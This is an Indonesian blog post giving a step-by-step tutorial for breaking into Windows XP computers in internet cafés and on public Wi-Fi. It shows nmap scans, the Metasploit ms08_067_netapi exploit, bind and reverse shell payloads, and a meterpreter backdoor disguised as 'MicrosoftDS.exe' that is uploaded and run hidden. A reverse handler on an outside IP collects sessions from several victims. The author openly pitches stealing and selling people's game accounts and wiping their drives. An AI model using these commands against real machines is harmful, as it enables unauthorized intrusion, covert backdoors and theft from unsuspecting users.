kali ini saya akan memapaparkan tentang bagaimana cara kita menyusup ke komputer yang terinstall windows XP service pack 1 sampai dengan 3..
pastikan juga kalian mempunya DEEPFREEZE REMOVER untuk itu bisa kalian lihat di postingan saya sebelumnya.kenapa saya menganjurkan kalian mempunya deepfreeze remover, karena bisa saja warnet tempat kalian bermain di lock installation new softwarenya.
tetapi pasti teman teman menanyakan 2 pertanyaan kepada saya tentang:
1.> Keuntungan Apa yang di dapatkan dari menyusup ke komputer orang lain :
*.> Pengetahuan yang baru yang bisa jadi berguna untuk anda
*.> sebagai sarana perkerjaan baru…ya iaaalahh..gimana Coba klo kita berhasil menguasai jaringan di dalam suatu fasilitas umum ( wiffii gratisan, warkop ataupun Warnet )..wahhh bisa anda bayangkan kan…
kita bisa mengambil chips orang dengan mudah dan menjualNYa dengan senang hati….. karna AKUN ANDA ADA PADA KAMI …hehehhehe ( tapi saya tidak begitu loh..hanya sekedar share )… eh satu hal lagi, anda bisa memformat hardisk Laptop pengguna wiffi dengan Mudah..huahuahuahuahuahahua…
2.> bagaimana caranya, ..hehehe AJAR DULUEE …hehhe pasti begitu TOoo… huahuahuahuahuahuahuahuahua….
so lanjut ke topik Utama….hiaaattt huattttCCiiiimmmss
1 2 3 4 5 6 7 8 | yang kita mesti sediakan adalah beberapa alat bantu , yang bisa anda dapatkan secara GRATIS... - OS BACKTRACK ( terserah Backtrack 3 Or 4 ) hehehehe - John the Ripper - pwdump6 ( http://www[dot]foofus[dot]net/fizzgig/pwdump/ ) - TROJAN Buatan Sendiri atau keylogeer atau apalahhhh - kopi panas - pisang goreng atau Roti bakar ( Yang KEju Nahh ) - ROKOK SAMPOERNA ^_^!!! huahuahua |
sekarang Kita mulai exploited memakai metasploit yang sudah include di backtrack
Untuk lebih memahami tentang Xploited , silahkan kunjungi http://www[dot]metasploit[dot]com/, karna saya tidak akan membahas bahasan Perintah yang akan kita gunakan
Pertama kita masuk dulu ke konsole( itueee Klo di windows namanYa CMD ) , nah klo sudah terbuka, ketik :
uing~BT#msfconsole
Untuk Melihat Lihat list exploits-nya , gunakan perintah :
1 2 3 4 5 6 7 8 | msf > show exploits windows / smb / ms 05 _ 039 _pnp Microsoft Plug and Play Service Overflow windows / smb / ms 06 _ 025 _rasmans_reg Microsoft RRAS Service RASMAN Registry Overflow windows / smb / ms 06 _ 025 _rras Microsoft RRAS Service Overflow windows / smb / ms 06 _ 040 _netapi Microsoft Server Service NetpwPathCanonicalize Overflow windows / smb / ms 06 _ 066 _nwapi Microsoft Services MS 06 -066 nwapi 32. dll windows / smb / ms 06 _ 066 _nwwks Microsoft Services MS 06 -066 nwwks.dll windows / smb / ms 08 _ 067 _netapi Microsoft Server Service Relative Path Stack Corruption |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | msf > sudo nmap - v - sS - A - O 192.1 68.1 . 28 [ * ] exec : sudo nmap - v - sS - A - O 192.1 68.1 . 28 [sudo] password for test : Starting Nmap 4.6 2 ( http : / / nmap.org / ) at 2009 -03 -21 23 : 50 CIT Initiating ARP Ping Scan at 23 : 50 Scanning 192.1 68.1 . 28 [ 1 port] Host 192.1 68.1 . 28 appears to be up ... good. Interesting ports on 192.1 68.1 . 28 : Not shown : 1712 closed ports PORT STATE SERVICE VERSION 135 / tcp open msrpc Microsoft Windows RPC 139 / tcp open netbios - ssn 445 / tcp open microsoft - ds Microsoft Windows XP microsoft - ds < ------ MAC Address : 00 : 1 E : 8 C : 67 : 59 : F 9 ( Asustek Computer ) Device type : general purpose Running : Microsoft Windows XP OS details : Microsoft Windows 2000 SP 4 , or Windows XP SP 2 or SP 3 Network Distance : 1 hop TCP Sequence Prediction : Difficulty = 258 ( Good luck! ) IP ID Sequence Generation : Incremental Service Info : OS : Windows |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | msf > use windows / smb / ms 08 _ 067 _netapi msf exploit ( ms 08 _ 067 _netapi ) > Lihat opsi dari exploit ini dengan mengetikkan show options : msf exploit ( ms 08 _ 067 _netapi ) > show options Module options : Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use ( BROWSER , SRVSVC ) Exploit target : Id Name -- ---- 0 Automatic Targeting |
1 2 | msf exploit ( ms 08 _ 067 _netapi ) > set rhost 192.1 68.1 . 28 rhost = > 192.1 68.1 . 28 |
1 2 3 4 5 6 7 8 9 10 | msf exploit ( ms 08 _ 067 _netapi ) > show targets Exploit targets : Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP 0 / SP 1 Universal 3 Windows XP SP 2 English ( NX ) 4 Windows XP SP 3 English ( NX ) -------- cut ----------- |
1 2 | msf exploit ( ms 08 _ 067 _netapi ) > set payload windows / shell_bind_tcp payloads = > windows / shell_bind_tcp |
1 2 3 4 5 6 7 8 9 10 | msf exploit ( ms 08 _ 067 _netapi ) > show payloads Compatible payloads = = = = = = = = = = = = = = = = = = = Name Description ---- ----------- generic / debug_trap Generic x 86 Debug Trap generic / debug_trap / bind_ipv 6 _tcp Generic x 86 Debug Trap , Bind TCP Stager ( IPv 6 ) generic / debug_trap / bind_nonx_tcp Generic x 86 Debug Trap , Bind TCP Stager ( No NX Support ) generic / debug_trap / bind_tcp Generic x 86 Debug Trap , Bind TCP Stager ----------- dipotong sampai disini --------------- |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | msf exploit ( ms 08 _ 067 _netapi ) > show options Module options : Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.1 68.1 . 28 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use ( BROWSER , SRVSVC ) Payload options ( windows / shell_bind_tcp ) : Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique : seh , thread , process LPORT 4444 yes The local port RHOST 192.1 68.1 . 28 no The target address Exploit target : Id Name -- ---- 0 Automatic Targeting sekarang jalankan exploit : msf exploit ( ms 08 _ 067 _netapi ) > exploit [ * ] Started bind handler [ * ] Automatically detecting the target ... [ * ] Fingerprint : Windows XP Service Pack 2 - lang : English [ * ] Selected Target : Windows XP SP 2 English ( NX ) [ * ] Triggering the vulnerability... [ * ] Command shell session 1 opened ( 192.1 68.1 . 6 : 33270 - > 192.1 68.1 . 28 : 4444 ) Microsoft Windows XP [Version 5.1 . 2600 ] © Copyright 1985 -2001 Microsoft Corp. |
nah untuk itu..anda harus mencari sendiri cara untuk mengistal trojan di komputerNya dan mendapatkan sesuatu yang anda inginkan…..
kan sa sudah kasihkan sampai penguasaan komputer….sekarang terserah anda.. ^_^ mat belajar yahh…..
Nah Saya Akan tambahkan lagi cara Menyusupkan Program Kekomputer target.
Menyusupkan file pada kompi orang……
pake metasploit”
sedikit tutorial .
Mungkin sebagian sudah ada yang tahu bahwa metasploit dapat digunakan untuk membuat backdoor, pernah juga disinggung pada toket edisi new year 2009. Penggunaan backdoor ini sangat berguna terutama sebagai post-exploitation method. Pada contoh kali ini kita akan memanfaatkan 2 metode dasar mendapatkan shell dari target, yaitu bind_tcp dan reverse_tcp.
Untuk bind_tcp, backdoor akan dijalankan pada terget dimana target akan membuka port pada sistemnya sendiri. Sehingga setelah proses exploitasi selesai, kita dapat masuk kapan saja ke target dengan memanfaatkan port yang telah dibuka oleh backdoor tersebut.
1 2 3 4 5 | $ . / msfpayload windows / meterpreter / bind_tcp LPORT = 4321 RHOST = 10.1 0.9 6.1 43 EXITFUNC = thread X > MicrosoftDS.exe Created by msfpayload ( http : / / www[dot]metasploit[dot]com ) . Payload : windows / meterpreter / bind_tcp Length : 307 Options : LPORT = 4321 , RHOST = 10.1 0.9 6.1 43 , EXITFUNC = thread |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | msf exploit ( ms 08 _ 067 _netapi ) > exploit [ * ] Handler binding to LHOST 0.0 . 0.0 [ * ] Started reverse handler [ * ] Automatically detecting the target ... [ * ] Fingerprint : Windows XP Service Pack 0 / 1 - lang : English [ * ] Selected Target : Windows XP SP 0 / SP 1 Universal [ * ] Triggering the vulnerability... [ * ] Transmitting intermediate stager for over - sized stage... ( 191 bytes ) [ * ] Sending stage ( 2650 bytes ) [ * ] Sleeping before handling stage... [ * ] Uploading DLL ( 75787 bytes ) ... [ * ] Upload completed. [ * ] Meterpreter session 3 opened ( 10.1 0.9 7.1 4 : 31338 - > 10.1 0.9 6.1 43 : 4780 ) meterpreter > cd \ meterpreter > pwd C : \ meterpreter > upload MicrosoftDS.exe [ * ] uploading : MicrosoftDS.exe - > MicrosoftDS.exe [ * ] uploaded : MicrosoftDS.exe - > MicrosoftDS.exe meterpreter > execute - f MicrosoftDS.exe - H Process 2348 created. |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | msf > use exploit / multi / handler msf exploit ( handler ) > set PAYLOAD windows / meterpreter / bind_tcp PAYLOAD = > windows / meterpreter / bind_tcp msf exploit ( handler ) > set LPORT 4321 LPORT = > 4321 msf exploit ( handler ) > set RHOST 10.1 0.9 6.1 43 RHOST = > 10.1 0.9 6.1 43 msf exploit ( handler ) > exploit [ * ] Starting the payload handler... [ * ] Started bind handler [ * ] Transmitting intermediate stager for over - sized stage... ( 191 bytes ) [ * ] Sending stage ( 2650 bytes ) [ * ] Sleeping before handling stage... [ * ] Uploading DLL ( 75787 bytes ) ... [ * ] Upload completed. [ * ] Meterpreter session 2 opened ( 10.1 0.9 7.1 4 : 58798 - > 10.1 0.9 6.1 43 : 4321 ) meterpreter > |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | msf > use exploit / multi / handler msf exploit ( handler ) > set PAYLOAD windows / meterpreter / reverse_tcp PAYLOAD = > windows / meterpreter / reverse_tcp msf exploit ( handler ) > show options Module options : Name Current Setting Required Description ---- --------------- -------- ----------- Payload options ( windows / meterpreter / reverse_tcp ) : Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh yes Exit technique : seh , thread , process LHOST yes The local address LPORT 4444 yes The local port Exploit target : Id Name -- ---- 0 Wildcard Target msf exploit ( handler ) > set LPORT 53 LPORT = > 53 msf exploit ( handler ) > set LHOST 222.1 24.1 99.7 6 LHOST = > 222.1 24.1 99.7 6 msf exploit ( handler ) > set ExitOnSession false msf exploit ( handler ) > exploit [ * ] Handler binding to LHOST 0.0 . 0.0 [ * ] Started reverse handler [ * ] Starting the payload handler... |
1 2 3 4 5 6 7 | $ . / msfpayload windows / meterpreter / reverse_tcp LPORT = 53 LHOST = 222.1 24.1 99.7 6 EXITFUNC = thread X > MicrosoftDS.exe Created by msfpayload ( http : / / www.metasploit.com ) . Payload : windows / meterpreter / reverse_tcp Length : 278 Options : LPORT = 53 , LHOST = 222.1 24.1 99.7 6 , EXITFUNC = thread $ file MicrosoftDS.exe MicrosoftDS.exe : MS - DOS executable PE for MS Windows ( GUI ) Intel 80386 32 - bit |
1 2 3 4 5 6 7 8 9 10 11 | [ * ] Handler binding to LHOST 0.0 . 0.0 [ * ] Started reverse handler [ * ] Starting the payload handler... [ * ] Transmitting intermediate stager for over - sized stage... ( 191 bytes ) [ * ] Sending stage ( 2650 bytes ) [ * ] Sleeping before handling stage... [ * ] Uploading DLL ( 75787 bytes ) ... [ * ] Upload completed. [ * ] Meterpreter session 3 opened ( 222.1 24.1 99.7 6 : 53 - > 10.1 0.9 6.1 43 : 4831 ) meterpreter > |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | msf exploit ( handler ) > sessions - l Active sessions = = = = = = = = = = = = = = = Id Description Tunnel -- ----------- ------ 3 Meterpreter 222.1 24.1 99.7 6 : 53 - > 10.1 0.9 6.1 46 : 4831 4 Meterpreter 222.1 24.1 99.7 6 : 53 - > 10.1 0.9 6.2 23 : 4836 5 Meterpreter 222.1 24.1 99.7 6 : 53 - > 10.1 0.9 6.2 15 : 4838 6 Meterpreter 222.1 24.1 99.7 6 : 53 - > 172.1 6.9 6.1 43 : 4840 7 Meterpreter 222.1 24.1 99.7 6 : 53 - > 172.1 6.9 6.1 43 : 4845 8 Meterpreter 222.1 24.1 99.7 6 : 53 - > 172.1 6.9 6.1 43 : 4846 9 Meterpreter 222.1 24.1 99.7 6 : 53 - > 172.1 6.9 6.1 43 : 4847 msf exploit ( handler ) > sessions - i 3 [ * ] Starting interaction with 3. .. meterpreter > sysinfo Computer : PROGWAR OS : Windows XP ( Build 2600 , ) . |
bisa juga di gunakan untuk eksekusi dan upload file,,
kreasiin ya
Nah Untuk Tools Pendukungnya Silahkan sedot Disini , saya lengkapi juga dengan Video Tutorialnya :
Metasploit Framework Console
Backdoring Tools
Untuk Scan IP Range dan Port 445
No comments:
Post a Comment